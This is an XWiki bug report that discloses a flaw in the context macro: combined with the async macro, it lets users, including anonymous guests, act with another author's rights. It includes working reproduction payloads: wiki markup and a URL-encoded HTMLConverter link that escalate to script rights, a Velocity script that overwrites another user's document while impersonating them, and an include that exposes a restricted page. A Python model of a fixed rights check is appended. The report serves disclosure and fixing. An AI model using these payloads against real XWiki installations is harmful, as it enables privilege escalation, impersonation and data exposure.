Details
- Bug
- Resolution: Fixed
- Blocker
- 3.0 M1
- Unit
- High
- Unknown
- N/A
Description
The context macro, in combination with the async macro, allows executing macros as any user without programming rights who authored at least one document the current user can access. The current user might be a guest user. This allows several kinds of attacks:
Escalation to script rights - steps to reproduce:
- Create a document (this can also be your user profile) with the content
{{context document="xwiki:XWiki.username" transformationContext="document"}}{{velocity}}Hello from Velocity!{{/velocity}}{{/context}}
Replace xwiki:XWiki.username with the document reference of a document whose author has script rights.
Alternative with anonymous view rights: open
<Server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bcontext%20document%3D%22xwiki%3AXWiki.username%22%20transformationContext%3D%22document%22%7D%7D%7B%7Bvelocity%7D%7DHello%20from%20Velocity!%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fcontext%7D%7D
where <Server> is the URL of your XWiki installation. You might need to replace the value of the text parameter (%7B%7Bcontext%20document%3D%22xwiki%3AXWiki.username%22%20transformationContext%3D%22document%22%7D%7D%7B%7Bvelocity%7D%7DHello%20from%20Velocity!%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fcontext%7D%7D) with the result of applying encodeURIComponent to the page content you want to use (in particular, replacing the document reference with that of a document whose author has script but not programming rights).
Expected result:
An error is displayed that the user doesn't have script rights.
Actual result:
The message "Hello from Velocity!" is displayed without any surrounding text, showing that the Velocity macro has been executed. This is because the context macro only checks whether the switch would grant the user programming rights, not whether it would grant script rights.
Impersonation (with script rights) - steps to reproduce:
Save a document with the following content (or execute it using the HTMLConverter as explained above):
{{context document="xwiki:XWiki.username" transformationContext="document"}}
{{async async="true" cached="false" context="doc.reference"}}
{{velocity}}
#set($myDoc = $xwiki.getDocument('xwiki:XWiki.username'))
#set($discard = $myDoc.setContent("Hello from attacker!"))
#set($discard = $myDoc.save())
{{/velocity}}
{{/async}}
{{/context}}
Expected result:
The document xwiki:XWiki.username is unchanged.
Actual result:
The content of xwiki:XWiki.username has been replaced by "Hello from attacker!" with content author XWiki.username even though this is executed by an anonymous attacker. I expect that this would also allow using the full admin privileges of the impersonated user.
Information disclosure - steps to reproduce:
- Create a document "Hello" that is accessible by the impersonated user but not the current user.
- Execute the following content (in the user profile or via the HTMLConverter):
{{context document="xwiki:XWiki.username" transformationContext="document"}}
{{async async="true" cached="false" context="doc.reference"}}
{{include page="Hello" /}}
{{/async}}
{{/context}}
Expected result:
The document "Hello" isn't displayed.
Actual result:
The document "Hello" is displayed.
Note that this doesn't even require that the impersonated user has script rights.
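As an added illustration (not XWiki's own code), the following Python model contrasts the check this report describes, which only looks for gained programming rights, with one that refuses the context switch whenever any right would be gained; it covers the script-right, impersonation and view-right cases above. Users, rights and document names are constructed for the example.

```python
# Added example, not XWiki's own code: models the right check a context switch
# needs, i.e. nested content must run with the current user's rights, never with
# rights gained through the referenced document's author. All data is constructed.
from dataclasses import dataclass

SCRIPT, PROGRAM, VIEW_HELLO = "script", "programming", "view:Hello"

@dataclass(frozen=True)
class User:
    name: str
    rights: frozenset

@dataclass(frozen=True)
class Document:
    reference: str
    author: User

class AccessDenied(Exception):
    pass

def effective_rights(current, context_doc, fixed=True):
    """Rights that content inside {{context document=...}} runs with. fixed=False
    reproduces the reported check (only programming rights are considered)."""
    gained = context_doc.author.rights - current.rights
    if not fixed:
        if PROGRAM in gained:
            raise AccessDenied("switch would grant programming rights")
        return context_doc.author.rights  # script/view rights silently gained
    if gained:  # fixed: refuse the switch as soon as any right would be gained
        raise AccessDenied(f"switch would grant {sorted(gained)}")
    return current.rights

def run_macro(rights, needed, output):
    """Stand-in for a nested macro that needs one right (velocity: SCRIPT,
    include of the page Hello: VIEW_HELLO); returns `output` if permitted."""
    if needed not in rights:
        raise AccessDenied(f"missing right {needed}")
    return output

def attempt(current, context_doc, needed, output, fixed=True):
    # Run a nested macro inside the context switch and report the outcome.
    try:
        return run_macro(effective_rights(current, context_doc, fixed), needed, output)
    except AccessDenied as e:
        return f"denied: {e}"

# Constructed actors: an anonymous visitor and a script-rights user whose profile the visitor can read.
GUEST = User("XWikiGuest", frozenset())
SCRIPT_USER = User("XWiki.username", frozenset({SCRIPT, VIEW_HELLO}))
PROFILE = Document("xwiki:XWiki.username", SCRIPT_USER)
```

With fixed=False the guest's nested velocity and include both succeed, exactly the outcome reported above; with fixed=True the switch itself is refused before any nested macro runs.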
Issue Links
- is caused by XWIKI-5815 Add a Context macro (Closed)